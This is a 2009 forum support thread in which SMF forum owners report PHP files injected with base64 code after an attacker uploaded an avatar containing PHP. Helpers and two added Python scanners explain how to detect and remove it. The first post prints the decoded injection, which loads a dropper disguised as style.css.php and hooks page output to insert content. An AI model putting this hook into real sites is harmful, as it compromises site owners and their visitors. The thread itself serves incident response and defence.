
Hacked, script injection

Started by vHawkeyev, May 01, 2009, 10:47:02 AM


vHawkeyev

All the php files on my site have been injected with Base64-encoded text that translates to

// Runs once per request; a global flag stops nested includes from hooking twice.
if(function_exists('ob_start')&&!isset($GLOBALS['sh_no'])){
    $GLOBALS['sh_no']=1;
    // Loads the dropper hidden in the theme's image folder; that file defines gml().
    if(file_exists('/home/jlgam4/public_html/mystiquestudios/forum/Themes/default/images/bbc/style.css.php')){
        include_once('/home/jlgam4/public_html/mystiquestudios/forum/Themes/default/images/bbc/style.css.php');
        if(function_exists('gml')&&!function_exists('dgobh')){
            // Minimal gzip unwrapper for servers whose PHP lacks gzdecode().
            if(!function_exists('gzdecode')){
                function gzdecode($d){
                    $f=ord(substr($d,3,1));$h=10;$e=0;
                    if($f&4){$e=unpack('v',substr($d,10,2));$e=$e[1];$h+=2+$e;}
                    if($f&8){$h=strpos($d,chr(0),$h)+1;}
                    if($f&16){$h=strpos($d,chr(0),$h)+1;}
                    if($f&2){$h+=2;}
                    $u=gzinflate(substr($d,$h));
                    if($u===FALSE){$u=$d;}
                    return $u;
                }
            }
            // Output-buffer callback: inserts whatever gml() returns right after <body>
            // (or in front of the whole page if there is no <body> tag).
            function dgobh($b){
                Header('Content-Encoding: none');
                $c=gzdecode($b);
                if(preg_match('/\<body/si',$c)){
                    return preg_replace('/(\<body[^\>]*\>)/si','$1'.gml(),$c);
                }else{
                    return gml().$c;
                }
            }
            ob_start('dgobh');
        }
    }
}

I had a look at the style.css.php file and it has been encoded multiple times. I finally got it all decoded but I don't know what it all means.

I removed the code from all my pages and deleted the style.css.php, but when I went to change my theme in my profile it came up with this page that showed details about my server and a list of directories, as well as all files that had been reinjected with the code above, and the style.css.php file reappeared. I'm stuck, I don't know what to do.

Plz help.

kat

If you don't have any mods installed, just upload fresh files from the SMF install package.

DO NOT OVERWRITE Settings.php

If you have mods, though, that will not be such a good idea.

Of course, you could restore a recent backup, if you have one...

Aleksi "Lex" Kilpinen

Quote from: vHawkeyev on May 01, 2009, 10:47:02 AM
All the php files on my site have been injected with Base64-encoded text that translates to
Do you have a recent member called "krisbarteo" ?
If you do, could you answer these couple of questions:

- Did he upload an avatar?
- Do you use the attachment folder for avatars, or some other custom folder?
- What other software than SMF are you running on your server?

Then please delete that user, and his avatar from your forum.
Slava Ukraini!
"Before you allow people access to your forum, especially in an administrative position, you must be aware that that person can seriously damage your forum. Therefore, you should only allow people that you trust, implicitly, to have such access." -Douglas

How you can help SMF

Tyrsson

Quote: style.css.php
This is not supposed to be a PHP file. It's a CSS file...
PM at your own risk, some I answer, if they are interesting, some I ignore.

bsm

I have the exact same problem.

My plan is to remove SMF, then re-build my site from backups.

As for "krisbarteo" - I had no such member, (my hacker was: 'Boommurne' ) but I do have an IP address of the culprit: 24.126.184.8

I'll do an admin on the DB and see what (if anything) was uploaded. (Also going to suspend uploads until I've got things cleared up).

What a mess!!!

karlbenson

What version of smf are you using? 1.1.8?
What mods are you using?
Are you using any integrations?

Are you using any of the following on that server?
- wordpress
- any software with tinymce editor?

bsm

I'm using 1.1.8, with Ad mod - also TP 0.9.8

Just checked (I have an identical install that I use for testing) avatars - both the same. So, it wasn't an avatar.

There's no other SW on the domain in question.

vHawkeyev

Yes I do have the member krisbarteo

It doesn't seem as if he has uploaded an avatar but when I had a look in my attachments folder I found his avatar, I then downloaded it and opened it in notepad and I found php code. I use the attachments folder for storing avatars.

I have deleted everything to do with krisbarteo and added his IP to my server blacklist.

Mods Installed:
Updated Registration Agreement
The Rules

Kindred

What version of SMF were you running?
Glory to Ukraine!

Please do not PM, IM or Email me with support questions.  You will get better and faster responses in the support boards.  Thank you.

"Loki is not evil, although he is certainly not a force for good. Loki is... complicated."

vHawkeyev


bsm

I'm using 1.1.8 as well.

I'm diving in, replacing all PHP scripts with "clean" ones. Probably take me all day.

Once done, I'll have a clean backup of all my scripts so if this happens again I can just FTP the site back to normal.

"phasers on stun - we're going in"

sprntrcr

Using 1.1.8

I had the same issue and timestamps showed that it all started minutes after user krisbarteo joined the forum.

I banned him and removed his avatar file. I diffed against a backup and removed the base64 crap from about 50 files. Also check Themes/default/images/bbc. That is where a bunch of advertising for casinos was stashed.

It appears the avatar that was uploaded was an injection script, so I have disabled uploading of avatars until this issue is resolved.

Google "krisbarteo"  and see all the SMF forums he is a member of.   This is/could get real nasty.
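The two symptoms described in this thread (PHP files prefixed with an eval(base64_decode(...)) wrapper whose decoded payload hooks ob_start, and an "avatar" in the attachments folder that is really a PHP file) can both be found with a small scanner. The following Python script is an added example written for this page, not code from any poster or from SMF; the directory layout, file names and the base64 blob it builds are constructed sample data, and the marker list is an assumption about what such a payload contains, based only on the snippet pasted above.

```python
import base64
import os
import re
import tempfile

# Names that appear in the decoded payload pasted earlier in this thread.
# Finding any of them inside a base64_decode() literal is the signal we report.
PAYLOAD_MARKERS = ("ob_start", "gzinflate", "gzdecode", "preg_replace", "include_once")

# eval(base64_decode('...')) is the wrapper used to hide the injected code.
B64_CALL = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)")


def decode_candidates(text):
    """Yield the decoded text of every base64_decode('...') literal in a file."""
    for match in B64_CALL.finditer(text):
        blob = re.sub(r"\s+", "", match.group(1))
        try:
            yield base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except (ValueError, UnicodeDecodeError):
            continue  # not real base64; nothing to inspect


def scan_php_tree(root):
    """Return {relative path: [markers]} for PHP files whose decoded blob looks injected."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            found = set()
            for decoded in decode_candidates(text):
                found.update(m for m in PAYLOAD_MARKERS if m in decoded)
            if found:
                hits[os.path.relpath(path, root)] = sorted(found)
    return hits


def find_php_in_uploads(upload_dir):
    """Return upload files (avatars/attachments) that contain a PHP open tag."""
    tag = re.compile(rb"<\?(php|=)|<script\s+language\s*=\s*['\"]?php", re.I)
    suspicious = []
    for dirpath, _dirs, files in os.walk(upload_dir):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                if tag.search(fh.read()):
                    suspicious.append(os.path.relpath(path, upload_dir))
    return sorted(suspicious)


def build_sample_site():
    """Construct a throwaway site tree: one clean file, one injected, one bad avatar."""
    root = tempfile.mkdtemp(prefix="smf_scan_")
    os.makedirs(os.path.join(root, "Sources"))
    os.makedirs(os.path.join(root, "attachments"))
    with open(os.path.join(root, "Sources", "Clean.php"), "w") as fh:
        fh.write("<?php\necho 'hello';\n")
    # Constructed stand-in for the injected snippet: only the marker names matter.
    fake_payload = "if(function_exists('ob_start')){gzinflate('');ob_start('cb');}"
    blob = base64.b64encode(fake_payload.encode()).decode()
    with open(os.path.join(root, "Sources", "Load.php"), "w") as fh:
        fh.write("<?php eval(base64_decode('%s')); ?>\n<?php\necho 'site';\n" % blob)
    # Constructed "avatar": image header bytes followed by PHP code.
    with open(os.path.join(root, "attachments", "avatar_123.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff\xe0 JFIF junk <?php echo 'dropper'; ?>")
    return root


if __name__ == "__main__":
    site = build_sample_site()
    print(scan_php_tree(site))                                   # {'Sources/Load.php': ['gzinflate', 'ob_start']}
    print(find_php_in_uploads(os.path.join(site, "attachments")))  # ['avatar_123.jpg']
```

Point scan_php_tree at the forum root and find_php_in_uploads at the attachments (or custom avatar) directory. The scanner decodes the literal rather than grepping for base64_decode alone, because legitimate SMF code also calls that function; a hit with several markers from the list is what merits a closer look.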

Aleksi "Lex" Kilpinen

What other scripts are you running along SMF?

vHawkeyev

I managed to get rid of the script injections by deleting krisbarteo's profile and avatar, which had some PHP code in it that must have been used for the injection. Then I uploaded clean versions of all PHP files.

But now I'm having troubles with my themes.

bsm

The script injection will affect ALL your php scripts, including themes.

I'm about halfway through manually removing them all before the big upload.

oy vey... what a mess ! :'(

vHawkeyev

Quote: I managed to get rid of the script injections by deleting krisbarteo's profile and avatar, which had some PHP code in it that must have been used for the injection. Then I uploaded clean versions of all PHP files.

Like you said, it affects all PHP files, so I replaced every one.

Agent Orange

I have this same problem. I removed and banned krisbarteo, now I'll have to re-upload new php-files.

Quote from: Kat on May 01, 2009, 12:50:54 PM
DO NOT OVERWRITE Settings.php

What happens if you do that?

Never mind, I guess I got lucky first time around, as I didn't have a copy of that particular file (and as such, didn't overwrite it).

JBlaze

Quote from: Agent Orange on May 04, 2009, 04:44:33 PM
I have this same problem. I removed and banned krisbarteo, now I'll have to re-upload new php-files.

Quote from: Kat on May 01, 2009, 12:50:54 PM
DO NOT OVERWRITE Settings.php

I believe I actually did that first time around. What effect did it have on my forum?

Settings.php is what controls the connection between your forum and your database. It contains all the login info needed to connect.

To reset your Settings.php so it can connect back to your forum, use the repair_settings.php tool (What is repair_settings.php?).
Jason Clemons
Former Team Member 2009 - 2012

H

Some hackers will modify all files. You'll need to check if this code is present in Settings.php and remove it if it is. Otherwise the hack will remain.
-H
Former Support Team Lead
I recommend: Namecheap (domains), Fastmail (e-mail), Linode (VPS)

JBlaze

Quote from: H on May 04, 2009, 05:03:20 PM
Some hackers will modify all files. You'll need to check if this code is present in settings.php and remove it if it is. Otherwise the hack will remain

Also, to elaborate on that, there was a recent hack I had to "sanitize" where the hacker had injected extra PHP files into almost every directory. Make sure that there are no randomly named files, and also check your .htaccess for extra code as well.

On another note, check your index.php in the forum root directory as well as index.template.php in your themes directory for unwanted code.

These are all common places for hackers to inject code.
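The clean-up advice in the last few posts (re-upload the package files, do not overwrite Settings.php, look for randomly named extra files, check .htaccess and the theme templates) amounts to comparing the live forum tree against a clean copy of the same SMF version. Below is an added Python example that does that comparison; it is not code from the thread or from SMF, and the two small directory trees it builds, including the eval(base64_decode('Li4u')) prefix and the style.css.php stand-in, are constructed sample data.

```python
import hashlib
import os
import tempfile

# Files that legitimately differ from the install package and must be cleaned
# by hand rather than overwritten (Settings.php holds the database credentials).
REVIEW_ONLY = {"Settings.php"}


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def hash_tree(root):
    """Map every path under root (relative to root) to its SHA-256 digest."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            digests[os.path.relpath(full, root)] = sha256_of(full)
    return digests


def compare_trees(clean_root, live_root):
    """Classify live files against a clean reference tree.

    modified : same path, different content -> re-upload from the package
    extra    : only in the live tree (droppers in image folders, randomly named
               scripts, an added .htaccess) -> inspect, usually delete
    review   : site-specific files (Settings.php) -> clean by hand, never overwrite
    missing  : in the package but not live -> incomplete install or deleted file
    """
    clean, live = hash_tree(clean_root), hash_tree(live_root)
    report = {"modified": [], "extra": [], "review": [], "missing": []}
    for rel, digest in sorted(live.items()):
        base = os.path.basename(rel)
        if base in REVIEW_ONLY:
            report["review"].append(rel)
        elif rel not in clean:
            report["extra"].append(rel)
        elif clean[rel] != digest:
            report["modified"].append(rel)
    report["missing"] = sorted(set(clean) - set(live))
    return report


def build_sample_trees():
    """Construct a clean package tree and a live tree showing the thread's symptoms."""
    clean = tempfile.mkdtemp(prefix="smf_clean_")
    live = tempfile.mkdtemp(prefix="smf_live_")
    files = {
        "index.php": "<?php\nrequire 'SSI.php';\n",
        os.path.join("Sources", "Load.php"): "<?php\nfunction loadTheme() {}\n",
        os.path.join("Themes", "default", "index.template.php"): "<?php\necho 'tpl';\n",
    }
    for tree in (clean, live):
        for rel, body in files.items():
            os.makedirs(os.path.dirname(os.path.join(tree, rel)), exist_ok=True)
            with open(os.path.join(tree, rel), "w") as fh:
                fh.write(body)
    # Live-only differences: an injected prefix on one source file, a dropper in
    # the bbc image folder, and the site's own Settings.php (not in the package).
    with open(os.path.join(live, "Sources", "Load.php"), "w") as fh:
        fh.write("<?php eval(base64_decode('Li4u')); ?>\n" + files[os.path.join("Sources", "Load.php")])
    bbc = os.path.join(live, "Themes", "default", "images", "bbc")
    os.makedirs(bbc)
    with open(os.path.join(bbc, "style.css.php"), "w") as fh:
        fh.write("<?php /* constructed stand-in for a dropper */ ?>\n")
    with open(os.path.join(live, "Settings.php"), "w") as fh:
        fh.write("<?php\n$db_user = 'example';\n")
    return clean, live


if __name__ == "__main__":
    clean_dir, live_dir = build_sample_trees()
    for kind, paths in compare_trees(clean_dir, live_dir).items():
        print(kind, paths)
```

Run it with the unpacked install package as clean_root and the web root as live_root. Installed mods will show up under "modified", which is why the earlier advice distinguishes mod-free forums (just re-upload) from modded ones (compare by hand); anything under "extra" inside Themes/.../images or with a random name is exactly the kind of file the thread reports, and "review" lists the files you must inspect and clean without overwriting.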
